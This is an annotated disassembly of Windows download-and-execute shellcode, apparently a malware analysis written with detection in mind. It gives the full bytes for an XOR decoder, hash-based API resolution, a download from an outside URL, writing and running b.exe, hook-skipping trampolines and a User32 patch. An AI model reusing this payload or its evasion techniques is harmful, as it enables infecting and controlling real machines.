; Decoder stub, offsets 0x00-0x21. It finds its own address with a
; jmp/call/pop sequence and XORs the 0x47b bytes at offsets 0x22..0x49c with
; the single-byte key 0xd8.
; The listing below shows the body already decoded (offset 0x22 holds 0xE9),
; so run against these exact bytes the stub would take the early exit at 0x10.
; NOTE(review): the stub bytes and the 0xd8 key are the stable part of this
; sample for signatures; the body only matches a pattern after decoding.
self-decrypt:
00000000 90 nop
00000001 90 nop
00000002 EB19 jmp short 0x1d ; forward to the call at 0x1d
00000004 5B pop ebx ; ebx = runtime address of offset 0x22 (the call's return address)
00000005 4B dec ebx ; ebx = runtime address of offset 0x21, so [ebx+ecx] is 1-based
00000006 90 nop
00000007 33C9 xor ecx,ecx
00000009 90 nop
0000000A 807B01E9 cmp byte [ebx+0x1],0xe9 ; is the first body byte already a near-jmp opcode?
0000000E 7501 jnz 0x11 ; no: body is still encoded, decode it
00000010 C3 ret ; yes: return; the call's return address is already popped, so this uses whatever is on the stack
00000011 66B97B04 mov cx,0x47b ; number of bytes to decode
00000015 80340BD8 xor byte [ebx+ecx],0xd8 ; first iteration touches offset 0x49c
00000019 E2FA loop 0x15 ; last iteration (ecx = 1) touches offset 0x22
0000001B EB05 jmp short 0x22 ; enter the decoded body
0000001D E8E2FFFFFF call 0x4 ; pushes the address of offset 0x22
; Decoded body, part 1: locate the data table and resolve imports by hash.
; After this block:
;   esi = base of the table at offset 0x40d (each hash is replaced in place by
;         the resolved address),
;   edi = first byte after the 18 table entries (offset 0x455).
; Slots 0x00-0x38 come from the first module found through the PEB, slot 0x3c
; from User32, slot 0x40 from urlmon, slot 0x44 from shell32.
entry:
00000022 E9E1030000 jmp 0x408 ; 0x408 is "call 0x27", which pushes the table address 0x40d
00000027 5F pop edi ; edi = runtime address of the table at 0x40d
00000028 64A130000000 mov eax,[fs:0x30] ; PEB
0000002E 8B400C mov eax,[eax+0xc] ; PEB->Ldr
00000031 8B701C mov esi,[eax+0x1c] ; first entry of InInitializationOrderModuleList
00000034 AD lodsd ; eax = that entry's forward link, i.e. the second entry
00000035 8B6808 mov ebp,[eax+0x8] ; ebp = second entry's image base (presumably kernel32 on the targeted Windows versions; confirm)
00000038 8BF7 mov esi,edi ; keep the table base in esi; edi advances as slots are filled
0000003A 6A0F push byte +0xf
0000003C 59 pop ecx ; 15 entries to resolve from this module
0000003D E881030000 call 0x3c3 ; resolve one export by hash, store at [edi], edi += 4
00000042 90 nop
00000043 E2F8 loop 0x3d
00000045 6833320000 push dword 0x3233 ; "32\0\0"
0000004A 6855736572 push dword 0x72657355 ; "User" -> stack now holds "User32"
0000004F 54 push esp ; pointer to that string
00000050 8B460C mov eax,[esi+0xc] ; slot 0x0c: takes a DLL name, returns a module base (consistent with LoadLibraryA)
00000053 E8EF020000 call 0x347 ; call it through the hook-skipping trampoline
00000058 8BE8 mov ebp,eax ; resolver now works on User32
0000005A 6A01 push byte +0x1
0000005C 59 pop ecx ; one entry from User32 -> slot 0x3c
0000005D E861030000 call 0x3c3
00000062 E2F9 loop 0x5d
00000064 686F6E0000 push dword 0x6e6f ; "on\0\0"
00000069 6875726C6D push dword 0x6d6c7275 ; "urlm" -> "urlmon"
0000006E 54 push esp
0000006F 8B460C mov eax,[esi+0xc]
00000072 E8D0020000 call 0x347
00000077 8BE8 mov ebp,eax ; resolver now works on urlmon
00000079 6A01 push byte +0x1
0000007B 59 pop ecx ; one entry from urlmon -> slot 0x40
0000007C E842030000 call 0x3c3
00000081 E2F9 loop 0x7c
00000083 686C333200 push dword 0x32336c ; "l32\0"
00000088 687368656C push dword 0x6c656873 ; "shel" -> "shell32"
0000008D 54 push esp
0000008E 8B460C mov eax,[esi+0xc]
00000091 E8B1020000 call 0x347
00000096 8BE8 mov ebp,eax ; resolver now works on shell32
00000098 6A01 push byte +0x1
0000009A 59 pop ecx ; one entry from shell32 -> slot 0x44
0000009B E823030000 call 0x3c3
000000A0 E2F9 loop 0x9b
; Part 2: build "<folder>\a.exe" in a stack buffer and fetch the URL into it.
; The folder comes from the shell32 slot with the constant 0x1a; the argument
; shape (0, buffer, 0x1a, 0) is consistent with SHGetSpecialFolderPathA and
; CSIDL_APPDATA - confirm against the slot's hash.
; The URL pointer is edi, which after part 1 points at offset 0x455 (the
; string visible in the hexdump at the end of the listing).
000000A2 81EC00010000 sub esp,0x100
000000A8 8BDC mov ebx,esp
000000AA 81C380000000 add ebx,0x80 ; ebx = path buffer, upper half of the reserved area
000000B0 6A00 push byte +0x0
000000B2 6A1A push byte +0x1a
000000B4 53 push ebx
000000B5 6A00 push byte +0x0
000000B7 FF5644 call near [esi+0x44] ; shell32 slot, called directly (not through the trampoline)
000000BA 33C0 xor eax,eax
000000BC 40 inc eax
000000BD 803C0300 cmp byte [ebx+eax],0x0 ; scan for the terminating NUL, starting at index 1
000000C1 75F9 jnz 0xbc
000000C3 898690000000 mov [esi+0x90],eax ; remember the folder-path length
000000C9 C704035C612E65 mov dword [ebx+eax],0x652e615c ; append "\a.e"
000000D0 C744030478650000 mov dword [ebx+eax+0x4],0x6578 ; append "xe\0\0" -> "<folder>\a.exe"
000000D8 33C9 xor ecx,ecx
000000DA 51 push ecx
000000DB 51 push ecx
000000DC 53 push ebx ; destination file name
000000DD 57 push edi ; URL string
000000DE 51 push ecx
000000DF 33C0 xor eax,eax ; dead store, overwritten on the next line
000000E1 8B4640 mov eax,[esi+0x40] ; urlmon slot; (0, url, file, 0, 0) is consistent with URLDownloadToFileA
000000E4 E85E020000 call 0x347
000000E9 83F800 cmp eax,byte +0x0
000000EC 0F857F010000 jnz near 0x271 ; non-zero result: skip the file handling and go to 0x271
; Part 3: open the downloaded a.exe, take its size, and create b.exe next to it.
; Scratch variables live at table-relative offsets:
;   [esi+0x60] handle of a.exe    [esi+0x64] size of a.exe
;   [esi+0x84] handle of b.exe    [esi+0x8c] path buffer pointer
;   [esi+0x70], [esi+0x74] byte counters for the copy loop
; NOTE(review): with the table at 0x40d, offsets 0x60 and 0x64 fall on 0x46d
; and 0x471, inside the URL string (0x455-0x47a). A memory image captured after
; this point will therefore show the tail of the URL overwritten.
000000F2 6A00 push byte +0x0
000000F4 6A00 push byte +0x0
000000F6 6A03 push byte +0x3
000000F8 6A00 push byte +0x0
000000FA 6A02 push byte +0x2
000000FC 68000000C0 push dword 0xc0000000
00000101 53 push ebx ; "<folder>\a.exe"
00000102 8B4624 mov eax,[esi+0x24] ; 7 arguments (path, 0xc0000000, 2, 0, 3, 0, 0): consistent with CreateFileA opening an existing file read/write
00000105 E83D020000 call 0x347
0000010A 83F8FF cmp eax,byte -0x1 ; -1 is treated as failure
0000010D 0F845E010000 jz near 0x271
00000113 894660 mov [esi+0x60],eax
00000116 6A00 push byte +0x0
00000118 50 push eax
00000119 FF5628 call near [esi+0x28] ; (handle, 0); the result is used below as a byte count (consistent with GetFileSize)
0000011C 894664 mov [esi+0x64],eax
0000011F 8B8690000000 mov eax,[esi+0x90] ; saved folder-path length
00000125 C704035C622E65 mov dword [ebx+eax],0x652e625c ; rewrite the suffix to "\b.e"
0000012C C744030478650000 mov dword [ebx+eax+0x4],0x6578 ; "xe\0\0" -> "<folder>\b.exe"
00000134 6A00 push byte +0x0
00000136 6A00 push byte +0x0
00000138 6A02 push byte +0x2
0000013A 6A00 push byte +0x0
0000013C 6A00 push byte +0x0
0000013E 6800000040 push dword 0x40000000
00000143 53 push ebx
00000144 8B4624 mov eax,[esi+0x24] ; same slot with (path, 0x40000000, 0, 0, 2, 0, 0): write access, disposition 2
00000147 E8FB010000 call 0x347
0000014C 83F8FF cmp eax,byte -0x1
0000014F 0F841C010000 jz near 0x271
00000155 898684000000 mov [esi+0x84],eax
0000015B 899E8C000000 mov [esi+0x8c],ebx
00000161 8B4660 mov eax,[esi+0x60] ; redundant: reloaded again at 0x16a before use
00000164 6A00 push byte +0x0
00000166 6A00 push byte +0x0
00000168 6A00 push byte +0x0
0000016A 8B4660 mov eax,[esi+0x60]
0000016D 50 push eax
0000016E FF5638 call near [esi+0x38] ; (a.exe handle, 0, 0, 0): consistent with SetFilePointer to the start of the file
00000171 C7467000000000 mov dword [esi+0x70],0x0
00000178 C7467400000000 mov dword [esi+0x74],0x0
; Part 4: copy a.exe to b.exe in 0x400-byte chunks, XOR-decoding each chunk.
; Every byte is XORed with 0x95 except bytes equal to 0x00 or 0x95, which are
; left unchanged. ebx counts the bytes still to be written.
; NOTE(review): this means the object fetched over the network and the a.exe
; written to disk are both encoded; only b.exe holds the decoded content, so
; content inspection of the download alone will not show the final file.
0000017F 81C700020000 add edi,0x200 ; chunk buffer = URL pointer + 0x200, i.e. past the decoded shellcode body
00000185 33DB xor ebx,ebx ; dead store, overwritten on the next line
00000187 8B5E64 mov ebx,[esi+0x64] ; ebx = size of a.exe
0000018A 6A00 push byte +0x0
0000018C 8D4670 lea eax,[esi+0x70] ; receives the byte count of the read
0000018F 50 push eax
00000190 6800040000 push dword 0x400
00000195 57 push edi
00000196 FF7660 push dword [esi+0x60]
00000199 FF5604 call near [esi+0x4] ; (a.exe handle, buffer, 0x400, &count, 0): consistent with ReadFile
0000019C 33C9 xor ecx,ecx ; dead store
0000019E B900040000 mov ecx,0x400 ; always walks the full 0x400 bytes, whatever the read returned
000001A3 807C0FFF95 cmp byte [edi+ecx-0x1],0x95
000001A8 740C jz 0x1b6 ; byte equals the key: leave it
000001AA 807C0FFF00 cmp byte [edi+ecx-0x1],0x0
000001AF 7405 jz 0x1b6 ; zero byte: leave it
000001B1 80740FFF95 xor byte [edi+ecx-0x1],0x95
000001B6 E2EB loop 0x1a3
000001B8 8BC3 mov eax,ebx
000001BA 2D00040000 sub eax,0x400
000001BF 83F800 cmp eax,byte +0x0
000001C2 7F03 jg 0x1c7 ; more than one chunk left: write the count the read reported
000001C4 895E70 mov [esi+0x70],ebx ; last chunk: write only the remaining byte count
000001C7 6A00 push byte +0x0
000001C9 8D4674 lea eax,[esi+0x74]
000001CC 50 push eax
000001CD FF7670 push dword [esi+0x70]
000001D0 57 push edi
000001D1 FFB684000000 push dword [esi+0x84]
000001D7 FF5630 call near [esi+0x30] ; (b.exe handle, buffer, count, &written, 0): consistent with WriteFile
000001DA 81EB00040000 sub ebx,0x400
000001E0 83FB00 cmp ebx,byte +0x0
000001E3 7FA5 jg 0x18a ; signed compare: loop while bytes remain
000001E5 FF7660 push dword [esi+0x60]
000001E8 FF5634 call near [esi+0x34] ; one handle argument: consistent with CloseHandle (a.exe)
000001EB FFB684000000 push dword [esi+0x84]
000001F1 FF5634 call near [esi+0x34] ; same slot for the b.exe handle
; Part 5: remove a.exe and start b.exe.
; The final call passes 12 arguments through the trampoline at 0x368; the
; argument layout (0, 0, command line, six zeros, two structure pointers, 0)
; and the "push 0xa08" replayed by that trampoline are consistent with
; CreateProcessInternalW on the targeted Windows build - confirm against the
; slot's hash. Execution falls through to 0x271 when the call returns.
; NOTE(review): observable artefacts of parts 2-5 are a.exe (transient) and
; b.exe in the resolved folder, and a child process started from b.exe by the
; exploited process.
000001F4 8B8690000000 mov eax,[esi+0x90] ; folder-path length
000001FA 8B9E8C000000 mov ebx,[esi+0x8c] ; path buffer
00000200 C704035C612E65 mov dword [ebx+eax],0x652e615c ; suffix back to "\a.e"; the "xe\0" tail is still in place
00000207 53 push ebx
00000208 FF562C call near [esi+0x2c] ; one path argument: consistent with DeleteFileA on a.exe
0000020B 8BBE8C000000 mov edi,[esi+0x8c]
00000211 8B8690000000 mov eax,[esi+0x90]
00000217 C704075C622E65 mov dword [edi+eax],0x652e625c ; suffix to "\b.e" -> "<folder>\b.exe"
0000021E 81EC00010000 sub esp,0x100
00000224 8BDC mov ebx,esp ; output buffer for the converted path
00000226 6800010000 push dword 0x100
0000022B 53 push ebx
0000022C 6800010000 push dword 0x100
00000231 57 push edi
00000232 6A00 push byte +0x0
00000234 6A00 push byte +0x0
00000236 FF561C call near [esi+0x1c] ; (0, 0, path, 0x100, out, 0x100): consistent with MultiByteToWideChar
00000239 8BFB mov edi,ebx ; edi = converted path
0000023B 33C0 xor eax,eax
0000023D 33DB xor ebx,ebx
0000023F 81EC00020000 sub esp,0x200
00000245 8BCC mov ecx,esp
00000247 83F854 cmp eax,byte +0x54
0000024A 7D08 jnl 0x254
0000024C 891C01 mov [ecx+eax],ebx ; zero 0x54 bytes at esp, one dword at a time
0000024F 83C004 add eax,byte +0x4
00000252 EBF3 jmp short 0x247
00000254 8BCC mov ecx,esp ; ecx = first 0x10 bytes of the zeroed area
00000256 8BD9 mov ebx,ecx
00000258 83C310 add ebx,byte +0x10 ; ebx = remaining 0x44 bytes of the zeroed area
0000025B 33C0 xor eax,eax
0000025D 50 push eax
0000025E 51 push ecx ; presumably the process-information output structure
0000025F 53 push ebx ; presumably the zeroed startup-information structure
00000260 50 push eax
00000261 50 push eax
00000262 50 push eax
00000263 50 push eax
00000264 50 push eax
00000265 50 push eax
00000266 57 push edi ; converted "<folder>\b.exe" in the command-line position
00000267 50 push eax
00000268 50 push eax
00000269 8B4608 mov eax,[esi+0x8]
0000026C E8F7000000 call 0x368 ; second trampoline variant (replays "push 0xa08")
; Part 6: reached after the process start and from every failure branch above.
; It (1) makes the User32 function in slot 0x3c writable and overwrites its
; first 7 bytes with a jump to offset 0x2ba, then (2) loads shdocvw, resets the
; stack pointer near the top of the thread stack and calls shdocvw export
; ordinal 0x65 with four zero arguments.
; NOTE(review): ordinal 0x65 is not named on the page; for shdocvw it is
; commonly reported as IEWinMain, which would fit restarting the browser's main
; routine so the host process keeps running - confirm.
; NOTE(review): the in-memory patch of a User32 export is detectable by
; comparing the loaded image against the file on disk.
00000271 8B7E3C mov edi,[esi+0x3c] ; address of the User32 function resolved in part 1
00000274 E834010000 call 0x3ad ; change protection of 0x1000 bytes at edi
00000279 E837000000 call 0x2b5 ; 0x2b5 calls the patch writer; its ret comes back to 0x27e
0000027E 6863767700 push dword 0x777663 ; "cvw\0"
00000283 687368646F push dword 0x6f646873 ; "shdo" -> "shdocvw"
00000288 54 push esp
00000289 8B460C mov eax,[esi+0xc] ; library-load slot
0000028C E8B6000000 call 0x347
00000291 89463C mov [esi+0x3c],eax ; slot 0x3c is reused for the shdocvw module handle
00000294 64A104000000 mov eax,[fs:0x4] ; TEB stack base
0000029A 8DA060FFFFFF lea esp,[eax+0xffffff60] ; esp = stack base - 0xa0: discards the corrupted stack
000002A0 6A65 push byte +0x65 ; ordinal 0x65 in place of a name pointer
000002A2 FF763C push dword [esi+0x3c]
000002A5 8B4610 mov eax,[esi+0x10] ; (module, 0x65): consistent with GetProcAddress by ordinal
000002A8 E89A000000 call 0x347
000002AD 33DB xor ebx,ebx
000002AF 53 push ebx
000002B0 53 push ebx
000002B1 53 push ebx
000002B2 53 push ebx
000002B3 FFD0 call eax ; if this returns, execution falls into 0x2b5
; 0x2b5 is a one-instruction thunk: "call 0x39f" pushes 0x2ba, and the patch
; writer at 0x39f embeds that address in the bytes it writes at [edi].
; 0x2ba is therefore the code that runs when the patched User32 function is
; called. It builds a fresh 9-entry hash table on the stack, resolves it the
; same way as part 1 (4 entries from the first PEB module, 5 from User32) and
; calls the second entry with a single zero argument.
; NOTE(review): a one-argument call with nothing reachable after it is
; consistent with a process or thread exit routine - confirm from hash
; 0x4fd18963. The five User32 entries are resolved but not called in the
; visible code.
000002B5 E8E5000000 call 0x39f
000002BA 81EC00010000 sub esp,0x100
000002C0 8BFC mov edi,esp
000002C2 83C704 add edi,byte +0x4 ; edi = table on the stack
000002C5 C7073274910C mov dword [edi],0xc917432 ; same value as the main table's slot 0x0c (bytes 32 74 91 0C at 0x419)
000002CB C747046389D14F mov dword [edi+0x4],0x4fd18963
000002D2 C74708A06597CB mov dword [edi+0x8],0xcb9765a0
000002D9 C7470C5140BA7F mov dword [edi+0xc],0x7fba4051
000002E0 C747103E1DB639 mov dword [edi+0x10],0x39b61d3e
000002E7 C74714B869D41B mov dword [edi+0x14],0x1bd469b8
000002EE C74718BE7F66A0 mov dword [edi+0x18],0xa0667fbe
000002F5 C7471CFCA937AD mov dword [edi+0x1c],0xad37a9fc
000002FC C74720980A10F8 mov dword [edi+0x20],0xf8100a98
00000303 64A130000000 mov eax,[fs:0x30] ; same PEB walk as at 0x28
00000309 8B400C mov eax,[eax+0xc]
0000030C 8B701C mov esi,[eax+0x1c]
0000030F AD lodsd
00000310 8B6808 mov ebp,[eax+0x8] ; ebp = base of the second module in initialization order
00000313 8BF7 mov esi,edi ; esi = table base
00000315 895664 mov [esi+0x64],edx ; saves edx as it was on entry; its meaning is not visible here
00000318 6A04 push byte +0x4
0000031A 59 pop ecx ; 4 entries from the first module
0000031B E8A3000000 call 0x3c3
00000320 90 nop
00000321 E2F8 loop 0x31b
00000323 6833320000 push dword 0x3233 ; "32\0\0"
00000328 6855736572 push dword 0x72657355 ; "User" -> "User32"
0000032D 54 push esp
0000032E 8B06 mov eax,[esi] ; entry 0 of this table, used as the library-load routine
00000330 E812000000 call 0x347
00000335 8BE8 mov ebp,eax
00000337 6A05 push byte +0x5
00000339 59 pop ecx ; 5 entries from User32
0000033A E884000000 call 0x3c3
0000033F E2F9 loop 0x33a
00000341 33FF xor edi,edi
00000343 57 push edi ; single argument: 0
00000344 FF5604 call near [esi+0x4] ; entry 1; the bytes that follow belong to the trampoline at 0x347
; API-call trampolines. Both take the target address in eax and jump to it, so
; the target returns straight to the trampoline's caller.
; If the target's first byte is 0xE9 (a near jmp, i.e. the entry looks
; inline-hooked) and the dword at target+5 is not 0x90909090, the trampoline
; replays what it assumes were the original first five bytes and enters the
; function at target+5, skipping the redirect:
;   0x347 replays "mov edi,edi / push ebp / mov ebp,esp"
;   0x368 replays "push 0xa08"
; The "cmp ...,0xe8" in each is ineffective: its flags are overwritten by the
; following "cmp ...,0xe9" before any branch reads them.
; NOTE(review): monitoring that relies only on a 5-byte jmp at the API entry
; point does not see calls made this way; the assumed prologues also tie the
; code to specific OS builds.
00000347 8038E8 cmp byte [eax],0xe8
0000034A 8038E9 cmp byte [eax],0xe9
0000034D 7511 jnz 0x360 ; entry does not start with a jmp: call it unmodified
0000034F 81780590909090 cmp dword [eax+0x5],0x90909090
00000356 7408 jz 0x360 ; four nops after the jmp: also call it unmodified
00000358 8BFF mov edi,edi ; replayed prologue, 5 bytes in total
0000035A 55 push ebp
0000035B 8BEC mov ebp,esp
0000035D 8D4005 lea eax,[eax+0x5] ; continue after the 5-byte jmp
00000360 FFE0 jmp eax
; 0x362: not referenced by any call in the visible listing. Passing through the
; patch writer would redirect the function at [edi] to 0x367, a bare "ret".
00000362 E838000000 call 0x39f
00000367 C3 ret
00000368 8038E8 cmp byte [eax],0xe8
0000036B 8038E9 cmp byte [eax],0xe9
0000036E 7511 jnz 0x381
00000370 81780590909090 cmp dword [eax+0x5],0x90909090
00000377 74E7 jz 0x360 ; shares the "jmp eax" of the first trampoline
00000379 68080A0000 push dword 0xa08 ; replayed first instruction of the target
0000037E 8D4005 lea eax,[eax+0x5]
00000381 FFE0 jmp eax
; 0x383: same shape as 0x362, redirect target 0x388 (bare "ret"); also
; unreferenced in the visible listing.
00000383 E817000000 call 0x39f
00000388 C3 ret
; Patch helpers.
; 0x389: unreferenced in the visible listing. Through the patch writer it would
;        redirect the function at [edi] to 0x38e, which returns 0x80040111 and
;        pops three arguments. NOTE(review): 0x80040111 is the HRESULT
;        CLASS_E_CLASSNOTAVAILABLE, which suggests a COM class-lookup style
;        callee - the intended target is not shown.
; 0x396: position lookup; returns the runtime address of 0x39f in eax. Also
;        unreferenced in the visible listing.
; 0x39f: patch writer. Pops its own return address into ebx and writes the
;        7 bytes "B8 <ebx> FF E0" (mov eax,imm32 / jmp eax) at [edi], then
;        returns to the caller's caller. The memory at edi must already be
;        writable (see 0x3ad).
00000389 E811000000 call 0x39f
0000038E B811010480 mov eax,0x80040111
00000393 C20C00 ret 0xc
00000396 EB02 jmp short 0x39a
00000398 58 pop eax ; eax = 0x39f (return address of the call at 0x39a)
00000399 C3 ret
0000039A E8F9FFFFFF call 0x398
0000039F 5B pop ebx ; ebx = address following the "call 0x39f" that got here
000003A0 C607B8 mov byte [edi],0xb8 ; opcode of mov eax,imm32
000003A3 895F01 mov [edi+0x1],ebx ; imm32 = redirect target
000003A6 66C74705FFE0 mov word [edi+0x5],0xe0ff ; bytes FF E0 = jmp eax
000003AC C3 ret ; return address was popped above, so this returns one frame further up
; Make 0x1000 bytes at edi writable before patching.
; In:  edi = address to unprotect, esi = resolved table.
; Out: eax = dword the callee wrote through the last argument (the previous
;      protection, if the slot is VirtualProtect as the arguments suggest).
; The argument shape (address, 0x1000, 0x40, pointer) is consistent with
; VirtualProtect and PAGE_EXECUTE_READWRITE - confirm against the slot's hash.
; NOTE(review): the original protection is never restored in the visible code,
; so the patched page stays writable and executable.
000003AD 53 push ebx ; reserve one dword on the stack for the output value
000003AE 8BDC mov ebx,esp
000003B0 53 push ebx ; pointer to that dword
000003B1 6A40 push byte +0x40
000003B3 6800100000 push dword 0x1000
000003B8 57 push edi
000003B9 8B4620 mov eax,[esi+0x20]
000003BC E886FFFFFF call 0x347
000003C1 58 pop eax ; discard the reserved dword into eax
000003C2 C3 ret
; Resolve one export by name hash.
; In:  ebp = module image base, edi = pointer to the wanted 32-bit hash.
; Out: the hash at [edi] is replaced by the export's address, edi += 4,
;      eax = that address. ecx and esi are preserved; ebx and edx are clobbered.
; Hash: for each byte c of the export name, h = ror(h, 7) + sign_extend(c),
;       starting from h = 0.
; NOTE(review): the name walk never reads the export directory's name count,
; so a hash with no match keeps reading past the end of the name table.
; NOTE(review): import resolution through the PEB and export hashes leaves no
; API name strings in the payload; the hash constants themselves are the
; searchable artefact.
000003C3 51 push ecx
000003C4 56 push esi
000003C5 8B753C mov esi,[ebp+0x3c] ; e_lfanew: offset of the PE header
000003C8 8B742E78 mov esi,[esi+ebp+0x78] ; RVA of the export directory
000003CC 03F5 add esi,ebp
000003CE 56 push esi ; keep the export directory pointer
000003CF 8B7620 mov esi,[esi+0x20] ; RVA of the name-pointer array
000003D2 03F5 add esi,ebp
000003D4 33C9 xor ecx,ecx
000003D6 49 dec ecx ; ecx = -1, incremented to 0 on the first name
000003D7 41 inc ecx ; ecx = index of the name being tested
000003D8 AD lodsd ; next name RVA
000003D9 03C5 add eax,ebp
000003DB 33DB xor ebx,ebx ; h = 0
000003DD 0FBE10 movsx edx,byte [eax]
000003E0 3AD6 cmp dl,dh ; dh is 0 for ASCII bytes, so this tests for the terminating NUL
000003E2 7408 jz 0x3ec
000003E4 C1CB07 ror ebx,0x7
000003E7 03DA add ebx,edx
000003E9 40 inc eax
000003EA EBF1 jmp short 0x3dd
000003EC 3B1F cmp ebx,[edi] ; compare with the wanted hash
000003EE 75E7 jnz 0x3d7 ; no match: next name
000003F0 5E pop esi ; export directory
000003F1 8B5E24 mov ebx,[esi+0x24] ; RVA of the ordinal array
000003F4 03DD add ebx,ebp
000003F6 668B0C4B mov cx,[ebx+ecx*2] ; name index -> function index
000003FA 8B5E1C mov ebx,[esi+0x1c] ; RVA of the function-address array
000003FD 03DD add ebx,ebp
000003FF 8B048B mov eax,[ebx+ecx*4]
00000402 03C5 add eax,ebp ; eax = absolute address of the export
00000404 AB stosd ; overwrite the hash with the address, advance edi
00000405 5E pop esi
00000406 59 pop ecx
00000407 C3 ret
; 0x408 is the only real instruction here: "call 0x27" pushes 0x40d, which the
; code at 0x27 pops as its data pointer. Everything from 0x40d on is data that
; the disassembler decoded as instructions.
; Layout derived from the code above: 18 dwords of export-name hashes at
; 0x40d-0x454 (15 + 1 + 1 + 1 entries resolved in part 1), then the
; NUL-terminated URL at 0x455 (see the hexdump at the end of the listing).
; How the resolved slots are used (table-relative offset -> call shape seen):
;   0x04 read into buffer     0x08 start process (via 0x368)
;   0x0c load library by name 0x10 look up export by ordinal
;   0x1c convert path string  0x20 change page protection
;   0x24 open/create file     0x28 file size
;   0x2c delete file          0x30 write from buffer
;   0x34 close handle         0x38 set file position
;   0x3c User32 function that gets patched
;   0x40 urlmon download      0x44 shell32 folder lookup
; Slots 0x00, 0x14 and 0x18 are resolved but not called in the visible code.
00000408 E81AFCFFFF call 0x27
0000040D B2F2 mov dl,0xf2
0000040F E2F4 loop 0x405
00000411 B236 mov dl,0x36
00000413 0F13F0 umov esi,eax
00000416 48 dec eax
00000417 7B3D jpo 0x456
00000419 3274910C xor dh,[ecx+edx*4+0xc] ; bytes 32 74 91 0C = hash 0x0c917432, slot 0x0c
0000041D 85DF test edi,ebx
0000041F AF scasd
00000420 BB6389D14F mov ebx,0x4fd18963
00000425 51 push ecx
00000426 40 inc eax
00000427 BA7F079222 mov edx,0x2292077f
0000042C 701E jo 0x44c
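(this section is probably junk: it looks like data decoded as instructions rather than code, since the call at 0x408 pushes 0x40d as a data pointer for the code at 0x27 and the hexdump below shows a URL string starting at 0x455)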
; Still data, not code: these bytes continue the block of 32-bit export-name
; hashes that the resolver at 0x3c3 consumes (it runs up to 0x454). The
; privileged and far-call instructions below (out, mov ss, call seg:off) are
; artefacts of decoding hash bytes as instructions.
0000042E A4 movsb
0000042F 64EF fs out dx,eax
00000431 93 xchg eax,ebx
00000432 32E4 xor ah,ah
00000434 94 xchg eax,esp
00000435 8E13 mov ss,[ebx]
00000437 0AAC7939E698C4 or ch,[ecx+edi*2+0xc498e639]
0000043E 8D1F lea ebx,[edi]
00000440 7457 jz 0x499
00000442 660DFF43 or ax,0x43ff
00000446 BEACDB980A mov esi,0xa98dbac
0000044B 10F8 adc al,bh
0000044D 80D6AF adc dh,0xaf
00000450 9AFB5315666874 call 0x7468:0x661553fb ; the trailing bytes 68 74 are "ht", the start of the URL at 0x455
(since there's a jump to 0x44c at 0x42c, here is an alternate decode starting at 0x44c; it isn't much help either, as the jump at 0x42c is itself decoded from data bytes)
0000044C F8 clc
0000044D 80D6AF adc dh,0xaf
00000450 9AFB5315666874 call 0x7468:0x661553fb
00000410 f4 b2 36 0f 13 f0 48 7b 3d 32 74 91 0c 85 df af |..6...H{=2t.....|
00000420 bb 63 89 d1 4f 51 40 ba 7f 07 92 22 70 1e a4 64 |.c..OQ@...."p..d|
00000430 ef 93 32 e4 94 8e 13 0a ac 79 39 e6 98 c4 8d 1f |..2......y9.....|
00000440 74 57 66 0d ff 43 be ac db 98 0a 10 f8 80 d6 af |tWf..C..........|
00000450 9a fb 53 15 66 68 74 74 70 3a 2f 2f 64 65 6d 6f |..S.fhttp://demo|
00000460 31 2e 66 74 70 61 63 63 65 73 73 2e 63 63 2f 64 |1.ftpaccess.cc/d|
00000470 65 6d 6f 2f 61 64 2e 6a 70 67 00 |emo/ad.jpg. |